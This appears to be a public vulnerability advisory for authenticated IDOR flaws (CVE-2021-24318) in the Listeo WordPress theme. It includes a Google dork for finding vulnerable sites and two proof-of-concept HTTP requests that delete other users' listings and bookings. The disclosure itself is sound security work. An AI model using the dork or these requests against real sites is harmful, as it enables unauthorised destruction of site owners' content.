Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities

2021.05.17
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CWE: CWE-639

/*! - # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities - # GOOGLE DORK: inurl:/wp-content/themes/listeo/ - # DATE: 2021-02-10 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Purethemes [ https://purethemes.net ] - # SOFTWARE VERSION: <= 1.6.10 - # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259 - # CVSS: Multiple - # CWE: CWE-639 - # CVE: CVE-2021-24318 */ ### -- [ Info: ] [i] Multiple Authenticated IDOR vulnerabilities was discovered in the Listeo theme through v1.6.10 for WordPress. [i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ]. ### -- [ Vulnerabilities: ] [x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=. [x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted. ### -- [ Impact: ] [~] Possibility to remove any content from the targeted website, up to the complete erasure of all content entirely. ### -- [ CVSS 3.1: ] [%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U [%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U ### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ] [!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100 [!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1 Host: listeo.pro Cookie: [user cookies] ### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Cookie: [user cookies] action=listeo_bookings_manage&booking_id=13&status=deleted ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-639%5D-Listeo-WordPress-Theme-v1.6.10.txt
https://twitter.com/vladm0ze


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top